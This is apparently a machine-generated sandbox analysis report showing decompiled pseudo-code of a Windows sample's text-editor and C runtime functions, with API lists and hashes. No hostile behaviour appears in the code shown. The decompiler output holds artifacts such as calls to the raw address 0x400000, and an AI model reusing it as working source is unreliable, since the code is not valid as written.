                      • Instruction Fuzzy Hash: 95312D76A40208EFDB119FA4EC48FDE7B68EB48304F158075FA05AB2A0DB75AD41DB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401D4C(WCHAR* __edi) {
                      				void* _v8;
                      				void* _v12;
                      				int _v16;
                      				void* _t19;
                      				void* _t26;
                      				signed int _t27;
                      				void* _t34;
                      				WCHAR* _t37;
                      				int _t38;
                      
                      				_t37 = __edi;
                      				_v16 = lstrlenW( *(__edi + 0x10));
                      				_t3 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                      				_t38 = _t3;
                      				_t19 = HeapAlloc(GetProcessHeap(), 0, _t38 + _t38);
                      				_t34 = _t19;
                      				if(_t34 != 0) {
                      					GetWindowTextW( *0x415f6c, _t34, _t38);
                      					SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
                      					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
                      					if(_t26 == 0) {
                      						L3:
                      						_t27 = _v12;
                      						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t37 + 0x10), _t34 + _t27 * 2) == 0) {
                      							SendMessageW( *0x415f6c, 0xc2, 1,  *(_t37 + 0x14));
                      						}
                      						HeapFree(GetProcessHeap(), 0, _t34);
                      						return E00401C3A(_t37);
                      					}
                      					_t19 = _t26 - 4;
                      					if(_t19 == 0) {
                      						goto L3;
                      					}
                      				}
                      				return _t19;
                      			}












                      0x00401d4c
                      0x00401d63
                      0x00401d6c
                      0x00401d6c
                      0x00401d7c
                      0x00401d82
                      0x00401d86
                      0x00401d90
                      0x00401daf
                      0x00401db7
                      0x00401db8
                      0x00401dbf
                      0x00401dbf
                      0x00401dca
                      0x00401ded
                      0x00401ded
                      0x00401df9
                      0x00000000
                      0x00401e00
                      0x00401dba
                      0x00401dbd
                      0x00000000
                      0x00000000
                      0x00401dbd
                      0x00401e08

                      APIs
                      • lstrlenW.KERNEL32(?), ref: 00401D57
                      • GetWindowTextLengthW.USER32 ref: 00401D66
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D75
                      • HeapAlloc.KERNEL32(00000000), ref: 00401D7C
                      • GetWindowTextW.USER32 ref: 00401D90
                      • SendMessageW.USER32(000000B0,?,?), ref: 00401DAF
                      • lstrcmpW.KERNEL32(?,?), ref: 00401DD3
                      • SendMessageW.USER32(000000C2,00000001,?), ref: 00401DED
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401DF2
                      • HeapFree.KERNEL32(00000000), ref: 00401DF9
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                      • String ID:
                      • API String ID: 276103653-0
                      • Opcode ID: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
                      • Instruction ID: 8ca4d24a7fc5045a5f5655c77c8d62678ef15db99f04df4acbda4ba5258b7913
                      • Opcode Fuzzy Hash: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
                      • Instruction Fuzzy Hash: 3211FE31A00609FFDB11AFA4EC88EDE7F79FF08345F008076F545A2160DB75A9948B68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 71%
                      			E00401B9F(struct HMENU__* __ebx) {
                      				signed int _t3;
                      				signed int _t7;
                      				signed int _t15;
                      				int _t25;
                      
                      				_t3 = SendMessageW( *0x415f6c, 0xc6, 0, 0);
                      				asm("sbb eax, eax");
                      				EnableMenuItem(__ebx, 0x110,  ~_t3 + 1);
                      				_t7 = IsClipboardFormatAvailable(1);
                      				asm("sbb eax, eax");
                      				EnableMenuItem(__ebx, 0x113,  ~_t7 + 1);
                      				_t25 = 0 | SendMessageW( *0x415f6c, 0xb0, 0, 0) >> 0x00000010 == _t11;
                      				EnableMenuItem(__ebx, 0x111, _t25);
                      				EnableMenuItem(__ebx, 0x112, _t25);
                      				EnableMenuItem(__ebx, 0x114, _t25);
                      				_t15 = GetWindowTextLengthW( *0x415f6c);
                      				asm("sbb eax, eax");
                      				return EnableMenuItem(__ebx, 0x116,  ~_t15 + 1);
                      			}







                      0x00401bb6
                      0x00401bc0
                      0x00401bca
                      0x00401bce
                      0x00401bd6
                      0x00401be0
                      0x00401c00
                      0x00401c09
                      0x00401c12
                      0x00401c1b
                      0x00401c23
                      0x00401c2b
                      0x00401c39

                      APIs
                      • SendMessageW.USER32(000000C6,00000000,00000000), ref: 00401BB6
                      • EnableMenuItem.USER32 ref: 00401BCA
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00401BCE
                      • EnableMenuItem.USER32 ref: 00401BE0
                      • SendMessageW.USER32(000000B0,00000000,00000000), ref: 00401BF1
                      • EnableMenuItem.USER32 ref: 00401C09
                      • EnableMenuItem.USER32 ref: 00401C12
                      • EnableMenuItem.USER32 ref: 00401C1B
                      • GetWindowTextLengthW.USER32 ref: 00401C23
                      • EnableMenuItem.USER32 ref: 00401C35
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                      • String ID:
                      • API String ID: 2096502293-0
                      • Opcode ID: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
                      • Instruction ID: 3a30abc31a22bbec39353dc46f3e4c67e205073161841612e8df996d8f39c960
                      • Opcode Fuzzy Hash: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
                      • Instruction Fuzzy Hash: 73014B71BD02187AF6242B36AC4BFFB2D1DDB81B51F148421B706EA0E2C9E558418964
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 55%
                      			E00401F93(WCHAR* __eax) {
                      				signed int _v8;
                      				short _v528;
                      				signed int _t17;
                      				signed int _t18;
                      				WCHAR* _t19;
                      				WCHAR* _t20;
                      				WCHAR* _t26;
                      				void* _t29;
                      				void* _t34;
                      				long _t35;
                      				signed int _t39;
                      				signed int _t40;
                      				signed int _t41;
                      				void* _t45;
                      				RECT* _t46;
                      				WCHAR* _t47;
                      				WCHAR* _t48;
                      
                      				_v8 = _v8 & 0x00000000;
                      				_t35 = 2;
                      				_t48 = __eax;
                      				_t45 = 0x20;
                      				L2:
                      				if( *_t48 == _t45) {
                      					_t48 = _t48 + _t35;
                      					goto L2;
                      				}
                      				_t17 =  *_t48 & 0x0000ffff;
                      				_t39 = (0 | _t17 == 0x00000022) + (0 | _t17 == 0x00000022) + 0x00000020 & 0x0000ffff;
                      				if(_t17 == _t39) {
                      					_t48 = _t48 + _t35;
                      				}
                      				_t46 = 0;
                      				while(1) {
                      					_t18 =  *_t48 & 0x0000ffff;
                      					if(_t18 == _t46) {
                      						break;
                      					}
                      					if(_t18 == _t39) {
                      						L10:
                      						_t48 = _t48 + _t35;
                      						L11:
                      						if( *_t48 == _t45) {
                      							goto L10;
                      						}
                      						_t19 = _t48;
                      						while(1) {
                      							_t40 =  *_t19 & 0x0000ffff;
                      							if(_t40 != _t45 && _t40 != 0x2d && _t40 != 0x2f) {
                      								break;
                      							}
                      							_t19 = _t19 + _t35;
                      							if(_t40 == _t45) {
                      								continue;
                      							}
                      							_t41 =  *_t19 & 0x0000ffff;
                      							if(_t41 == _t46) {
                      								L19:
                      								if( *_t19 == _t45) {
                      									goto L18;
                      								}
                      								if(_t41 == 0x50 || _t41 == 0x70) {
                      									if(_v8 == _t46) {
                      										_v8 = 1;
                      										_t48 = _t19;
                      									}
                      								}
                      								continue;
                      							}
                      							L18:
                      							_t19 = _t19 + _t35;
                      							goto L19;
                      						}
                      						_t20 =  *_t48 & 0x0000ffff;
                      						if(_t20 == _t46) {
                      							L41:
                      							return _t20;
                      						}
                      						if(_t20 != 0x22) {
                      							L30:
                      							0x400000(_t48);
                      							if(_t20 != 0) {
                      								L33:
                      								0x400000(_t48, 0xffffffff);
                      								_t20 = InvalidateRect( *0x415f64, _t46, _t46);
                      								if(_v8 == _t46) {
                      									goto L41;
                      								}
                      								0x400000();
                      								return _t20;
                      							}
                      							_t47 = L".txt";
                      							lstrcpynW( &_v528, _t48, 0x103 - lstrlenW(_t47));
                      							lstrcatW( &_v528, _t47);
                      							_t48 =  &_v528;
                      							_t26 = _t48;
                      							0x400000(_t26);
                      							if(_t26 == 0) {
                      								_t29 = E00401F1C( &_v528) - _t35;
                      								if(_t29 == 0) {
                      									return DestroyWindow( *0x415f64);
                      								}
                      								_t20 = _t29 - 4;
                      								if(_t20 != 0) {
                      									goto L41;
                      								}
                      								E0040101C( &_v528, 0);
                      								_t34 = CreateFileW( &_v528, 0x40000000, _t35, 0, 4, 0x80, 0);
                      								if(_t34 != 0xffffffff) {
                      									_t34 = CloseHandle(_t34);
                      								}
                      								0x400000();
                      								return _t34;
                      							}
                      							_t46 = 0;
                      							goto L33;
                      						}
                      						_t48 = _t48 + _t35;
                      						_t20 = _t48;
                      						if( *_t48 == _t46) {
                      							L29:
                      							 *_t20 = 0;
                      							goto L30;
                      						}
                      						while( *_t20 != 0x22) {
                      							_t20 = _t20 + _t35;
                      							if( *_t20 != _t46) {
                      								continue;
                      							}
                      							goto L29;
                      						}
                      						goto L29;
                      					}
                      					_t48 = _t48 + _t35;
                      				}
                      				if( *_t48 != _t39) {
                      					goto L11;
                      				}
                      				goto L10;
                      			}




















                      0x00401f9c
                      0x00401fa5
                      0x00401fa8
                      0x00401faa
                      0x00401faf
                      0x00401fb2
                      0x00401fad
                      0x00000000
                      0x00401fad
                      0x00401fb4
                      0x00401fc3
                      0x00401fc9
                      0x00401fcb
                      0x00401fcb
                      0x00401fcd
                      0x00401fd8
                      0x00401fd8
                      0x00401fde
                      0x00000000
                      0x00000000
                      0x00401fd4
                      0x00401fe5
                      0x00401fe5
                      0x00401fe7
                      0x00401fea
                      0x00000000
                      0x00000000
                      0x00401fec
                      0x00401fee
                      0x00401fee
                      0x00401ff4
                      0x00000000
                      0x00000000
                      0x00402000
                      0x00402005
                      0x00000000
                      0x00000000
                      0x00402007
                      0x0040200d
                      0x00402011
                      0x00402014
                      0x00000000
                      0x00000000
                      0x00402019
                      0x00402023
                      0x00402025
                      0x0040202c
                      0x0040202c
                      0x00402023
                      0x00000000
                      0x00402019
                      0x0040200f
                      0x0040200f
                      0x00000000
                      0x0040200f
                      0x00402030
                      0x00402036
                      0x0040212f
                      0x0040212f
                      0x0040212f
                      0x0040203f
                      0x0040205c
                      0x0040205d
                      0x00402064
                      0x004020aa
                      0x004020ad
                      0x004020ba
                      0x004020c3
                      0x00000000
                      0x00000000
                      0x004020c5
                      0x00000000
                      0x004020c5
                      0x00402066
                      0x00402082
                      0x00402090
                      0x00402096
                      0x0040209c
                      0x0040209f
                      0x004020a6
                      0x004020d8
                      0x004020da
                      0x00000000
                      0x00402125
                      0x004020dc
                      0x004020df
                      0x00000000
                      0x00000000
                      0x004020eb
                      0x00402106
                      0x0040210f
                      0x00402112
                      0x00402112
                      0x00402118
                      0x00000000
                      0x00402118
                      0x004020a8
                      0x00000000
                      0x004020a8
                      0x00402041
                      0x00402043
                      0x00402048
                      0x00402057
                      0x00402059
                      0x00000000
                      0x00402059
                      0x0040204a
                      0x00402050
                      0x00402055
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402055
                      0x00000000
                      0x0040204a
                      0x00401fd6
                      0x00401fd6
                      0x00401fe3
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • lstrlenW.KERNEL32(.txt), ref: 0040206C
                      • lstrcpynW.KERNEL32(?,?,00000103), ref: 00402082
                      • lstrcatW.KERNEL32(?,.txt), ref: 00402090
                      • InvalidateRect.USER32(00000000,00000000,?,000000FF), ref: 004020BA
                      • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,?,00000103), ref: 00402106
                      • CloseHandle.KERNEL32(00000000,?,00000103), ref: 00402112
                      • DestroyWindow.USER32(?,00000103), ref: 00402125
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: CloseCreateDestroyFileHandleInvalidateRectWindowlstrcatlstrcpynlstrlen
                      • String ID: .txt
                      • API String ID: 1344828188-2195685702
                      • Opcode ID: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
                      • Instruction ID: d28bfcdb09bc5182ac3aec5d8d3b4e3140d473f0e5bda905505ba1bfea716dd4
                      • Opcode Fuzzy Hash: 2c9ef08aaa4472e4d1a1f41eb2009585cc25f3eca019096f6f0960fa0a650124
                      • Instruction Fuzzy Hash: CB4126729002219ADB306B619D8CBBB76A8DB54318F65413BF542F72E1E7BD4EC1C358
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00406359(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr* _t49;
                      				struct _CRITICAL_SECTION* _t50;
                      				struct _CRITICAL_SECTION* _t54;
                      				intOrPtr _t55;
                      				struct _CRITICAL_SECTION* _t57;
                      				signed int _t62;
                      				struct _CRITICAL_SECTION* _t67;
                      				void* _t82;
                      				struct _CRITICAL_SECTION* _t84;
                      				signed int _t86;
                      				void* _t87;
                      
                      				_t82 = __edx;
                      				_push(0x10);
                      				_push(0x4120d8);
                      				E00405990(__ebx, __edi, __esi);
                      				_t84 = 0;
                      				 *(_t87 - 0x1c) = 0;
                      				E0040A357(0, 0, 1);
                      				 *((intOrPtr*)(_t87 - 4)) = 0;
                      				_t86 = 0;
                      				while(1) {
                      					 *(_t87 - 0x20) = _t86;
                      					if(_t86 >=  *0x4182a0) {
                      						break;
                      					}
                      					_t49 =  *0x417284 + _t86 * 4;
                      					if( *_t49 == 0) {
                      						_t50 = E00408BFA(0x38);
                      						 *( *0x417284 + _t86 * 4) = _t50;
                      						__eflags = _t50;
                      						if(_t50 != 0) {
                      							_t54 = InitializeCriticalSectionAndSpinCount( *( *0x417284 + _t86 * 4) + 0x20, 0xfa0);
                      							__eflags = _t54;
                      							_t55 =  *0x417284;
                      							if(_t54 != 0) {
                      								_t57 =  *((intOrPtr*)(_t55 + _t86 * 4)) + 0x20;
                      								__eflags = _t57;
                      								EnterCriticalSection(_t57);
                      								_t84 =  *( *0x417284 + _t86 * 4);
                      								 *(_t87 - 0x1c) = _t84;
                      								 *(_t84 + 0xc) = 0;
                      							} else {
                      								E00408BC0( *((intOrPtr*)(_t55 + _t86 * 4)));
                      								 *( *0x417284 + _t86 * 4) = 0;
                      							}
                      						}
                      						break;
                      					}
                      					_t62 =  *( *_t49 + 0xc);
                      					if((_t62 & 0x00000083) != 0 || (_t62 & 0x00008000) != 0) {
                      						L9:
                      						_t86 = _t86 + 1;
                      						continue;
                      					} else {
                      						_t11 = _t86 - 3; // -3
                      						_t94 = _t11 - 0x10;
                      						if(_t11 > 0x10) {
                      							L7:
                      							E004058F0(_t86,  *( *0x417284 + _t86 * 4));
                      							_t67 =  *( *0x417284 + _t86 * 4);
                      							if(( *(_t67 + 0xc) & 0x00000083) == 0) {
                      								_t84 = _t67;
                      								 *(_t87 - 0x1c) = _t84;
                      								break;
                      							} else {
                      								E0040595E(_t86, _t67);
                      								goto L9;
                      							}
                      						}
                      						_t12 = _t86 + 0x10; // 0x10
                      						if(E0040A295(0, _t82, _t84, _t86, _t94) == 0) {
                      							break;
                      						}
                      						goto L7;
                      					}
                      				}
                      				__eflags = _t84;
                      				if(_t84 != 0) {
                      					 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00008000;
                      					 *((intOrPtr*)(_t84 + 4)) = 0;
                      					 *((intOrPtr*)(_t84 + 8)) = 0;
                      					 *_t84 = 0;
                      					 *((intOrPtr*)(_t84 + 0x1c)) = 0;
                      					_t40 = _t84 + 0x10;
                      					 *_t40 =  *(_t84 + 0x10) | 0xffffffff;
                      					__eflags =  *_t40;
                      				}
                      				 *((intOrPtr*)(_t87 - 4)) = 0xfffffffe;
                      				E00406483();
                      				return E004059D5(_t84);
                      			}














                      0x00406359
                      0x00406359
                      0x0040635b
                      0x00406360
                      0x00406367
                      0x00406369
                      0x0040636e
                      0x00406374
                      0x00406377
                      0x00406379
                      0x00406379
                      0x00406382
                      0x00000000
                      0x00000000
                      0x0040638d
                      0x00406392
                      0x004063f1
                      0x004063fd
                      0x00406400
                      0x00406402
                      0x00406415
                      0x0040641b
                      0x0040641d
                      0x00406422
                      0x0040643a
                      0x0040643a
                      0x0040643e
                      0x00406449
                      0x0040644c
                      0x0040644f
                      0x00406424
                      0x00406427
                      0x00406432
                      0x00406432
                      0x00406422
                      0x00000000
                      0x00406402
                      0x00406396
                      0x0040639b
                      0x004063e5
                      0x004063e5
                      0x00000000
                      0x004063a4
                      0x004063a4
                      0x004063a7
                      0x004063aa
                      0x004063be
                      0x004063c7
                      0x004063d3
                      0x004063da
                      0x004063e8
                      0x004063ea
                      0x00000000
                      0x004063dc
                      0x004063de
                      0x00000000
                      0x004063e4
                      0x004063da
                      0x004063ac
                      0x004063b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004063b8
                      0x0040639b
                      0x00406452
                      0x00406454
                      0x00406456
                      0x0040645d
                      0x00406460
                      0x00406463
                      0x00406465
                      0x00406468
                      0x00406468
                      0x00406468
                      0x00406468
                      0x0040646c
                      0x00406473
                      0x0040647f

                      APIs
                        • Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
                        • Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
                        • Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381
                      • __mtinitlocknum.LIBCMT ref: 004063B0
                      • __malloc_crt.LIBCMT ref: 004063F1
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,004120D8,00000010,00403123,00412030,0000000C,004031A1,?,?,00000040,?,004025E0,?,00410660), ref: 00406415
                      • _free.LIBCMT ref: 00406427
                      • EnterCriticalSection.KERNEL32(?,?,004025E0,?,00410660), ref: 0040643E
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                      • String ID: ?
                      • API String ID: 2015852156-3428610318
                      • Opcode ID: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
                      • Instruction ID: b9cd1371c41a4ab66219e786f190016f3e2e04b6ac3045ceef4f163d49476006
                      • Opcode Fuzzy Hash: 8e7ca56090d353e5bc7da073f189eb37fa484c70df19706af74def21355532fe
                      • Instruction Fuzzy Hash: 523170715046019FC710DFA9D481A5AB7F4BB08324B5181BFF496A72D2CB79D4528F4D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E0040717C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t26;
                      				intOrPtr _t30;
                      				intOrPtr _t39;
                      				void* _t40;
                      
                      				_t31 = __ebx;
                      				_push(8);
                      				_push(0x412118);
                      				E00405990(__ebx, __edi, __esi);
                      				GetModuleHandleW(L"KERNEL32.DLL");
                      				_t39 =  *((intOrPtr*)(_t40 + 8));
                      				 *((intOrPtr*)(_t39 + 0x5c)) = 0x411108;
                      				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                      				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                      				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                      				 *((char*)(_t39 + 0xc8)) = 0x43;
                      				 *((char*)(_t39 + 0x14b)) = 0x43;
                      				 *(_t39 + 0x68) = 0x414588;
                      				E0040A357(__ebx, 1, 0xd);
                      				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                      				InterlockedIncrement( *(_t39 + 0x68));
                      				 *(_t40 - 4) = 0xfffffffe;
                      				E0040721E();
                      				E0040A357(_t31, 1, 0xc);
                      				 *(_t40 - 4) = 1;
                      				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                      				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                      				if(_t26 == 0) {
                      					_t30 =  *0x414cf0; // 0x414c18
                      					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                      				}
                      				E00408700( *((intOrPtr*)(_t39 + 0x6c)));
                      				 *(_t40 - 4) = 0xfffffffe;
                      				return E004059D5(E00407227());
                      			}







                      0x0040717c
                      0x0040717c
                      0x0040717e
                      0x00407183
                      0x0040718d
                      0x00407193
                      0x00407196
                      0x0040719d
                      0x004071a4
                      0x004071a7
                      0x004071aa
                      0x004071b1
                      0x004071b8
                      0x004071c1
                      0x004071c7
                      0x004071ce
                      0x004071d4
                      0x004071db
                      0x004071e2
                      0x004071e8
                      0x004071eb
                      0x004071ee
                      0x004071f3
                      0x004071f5
                      0x004071fa
                      0x004071fa
                      0x00407200
                      0x00407206
                      0x00407217

                      APIs
                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412118,00000008,00407284,00000000,00000000,?,004033DA,004029D6,?,?,?,004029D6,00000000,?), ref: 0040718D
                      • __lock.LIBCMT ref: 004071C1
                        • Part of subcall function 0040A357: __mtinitlocknum.LIBCMT ref: 0040A36D
                        • Part of subcall function 0040A357: __amsg_exit.LIBCMT ref: 0040A379
                        • Part of subcall function 0040A357: EnterCriticalSection.KERNEL32(00000000,00000000,?,004071C6,0000000D), ref: 0040A381
                      • InterlockedIncrement.KERNEL32(?), ref: 004071CE
                      • __lock.LIBCMT ref: 004071E2
                      • ___addlocaleref.LIBCMT ref: 00407200
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                      • String ID: KERNEL32.DLL
                      • API String ID: 637971194-2576044830
                      • Opcode ID: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
                      • Instruction ID: 828e2d9a6aef1ecd1850dd2157baaa58032c3ea6c81483b33c0403e429775c2e
                      • Opcode Fuzzy Hash: 0a91ecfa04415f3b9691a1c01f2d8f1f275eaf0e965da356deb9f58161e8f8cc
                      • Instruction Fuzzy Hash: 18016571844B00EBD710DF6AD805749FBE0BF54325F20891FE599663E1CBB8A544CF19
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E0040823F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed int _t15;
                      				LONG* _t21;
                      				void* _t31;
                      				LONG* _t33;
                      				void* _t34;
                      				void* _t35;
                      
                      				_t35 = __eflags;
                      				_t29 = __edx;
                      				_t25 = __ebx;
                      				_push(0xc);
                      				_push(0x4121a8);
                      				E00405990(__ebx, __edi, __esi);
                      				_t31 = E004072A9(__ebx, __edx, _t35);
                      				_t15 =  *0x414aa8; // 0xfffffffe
                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                      					E0040A357(_t25, _t31, 0xd);
                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                      					_t33 =  *(_t31 + 0x68);
                      					 *(_t34 - 0x1c) = _t33;
                      					__eflags = _t33 -  *0x4149b0; // 0x2502c30
                      					if(__eflags != 0) {
                      						__eflags = _t33;
                      						if(__eflags != 0) {
                      							__eflags = InterlockedDecrement(_t33);
                      							if(__eflags == 0) {
                      								__eflags = _t33 - 0x414588;
                      								if(__eflags != 0) {
                      									E00408BC0(_t33);
                      								}
                      							}
                      						}
                      						_t21 =  *0x4149b0; // 0x2502c30
                      						 *(_t31 + 0x68) = _t21;
                      						_t33 =  *0x4149b0; // 0x2502c30
                      						 *(_t34 - 0x1c) = _t33;
                      						InterlockedIncrement(_t33);
                      					}
                      					 *(_t34 - 4) = 0xfffffffe;
                      					E004082DA();
                      				} else {
                      					_t33 =  *(_t31 + 0x68);
                      				}
                      				_t38 = _t33;
                      				if(_t33 == 0) {
                      					_push(0x20);
                      					E004069B9(_t29, _t38);
                      				}
                      				return E004059D5(_t33);
                      			}









                      0x0040823f
                      0x0040823f
                      0x0040823f
                      0x0040823f
                      0x00408241
                      0x00408246
                      0x00408250
                      0x00408252
                      0x0040825a
                      0x0040827b
                      0x00408281
                      0x00408285
                      0x00408288
                      0x0040828b
                      0x00408291
                      0x00408293
                      0x00408295
                      0x0040829e
                      0x004082a0
                      0x004082a2
                      0x004082a8
                      0x004082ab
                      0x004082b0
                      0x004082a8
                      0x004082a0
                      0x004082b1
                      0x004082b6
                      0x004082b9
                      0x004082bf
                      0x004082c3
                      0x004082c3
                      0x004082c9
                      0x004082d0
                      0x00408262
                      0x00408262
                      0x00408262
                      0x00408265
                      0x00408267
                      0x00408269
                      0x0040826b
                      0x00408270
                      0x00408278

                      APIs
                      • __getptd.LIBCMT ref: 0040824B
                        • Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
                        • Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9
                      • __amsg_exit.LIBCMT ref: 0040826B
                      • __lock.LIBCMT ref: 0040827B
                      • InterlockedDecrement.KERNEL32(?), ref: 00408298
                      • _free.LIBCMT ref: 004082AB
                      • InterlockedIncrement.KERNEL32(02502C30), ref: 004082C3
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                      • String ID:
                      • API String ID: 3470314060-0
                      • Opcode ID: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
                      • Instruction ID: 9dd0b61804cb2939324514bc7d4c0d8b777e788f75e63934b552d476fc708038
                      • Opcode Fuzzy Hash: 11f5c857de3714da6356fe4488d6a5ed58f9aa1e56db6d9a73a6ef2baea13d47
                      • Instruction Fuzzy Hash: 5D018E71901B11EBCA10AB66A645B9A7760AB44760F1540BFE854732C0CB3C68918B9D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401051() {
                      				char _v8;
                      				void* _v12;
                      				int _v16;
                      				int _v20;
                      				long _t17;
                      				char _t19;
                      
                      				_t19 = 0x60;
                      				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v12) == 0) {
                      					_v16 = 4;
                      					_t17 = RegQueryValueExW(_v12, L"LogPixels", 0,  &_v20,  &_v8,  &_v16);
                      					if(_t17 == 0 && _v20 == 4 && _v8 != _t17) {
                      						_t19 = _v8;
                      					}
                      					RegCloseKey(_v12);
                      				}
                      				return _t19;
                      			}









                      0x0040105a
                      0x00401071
                      0x00401089
                      0x00401090
                      0x00401098
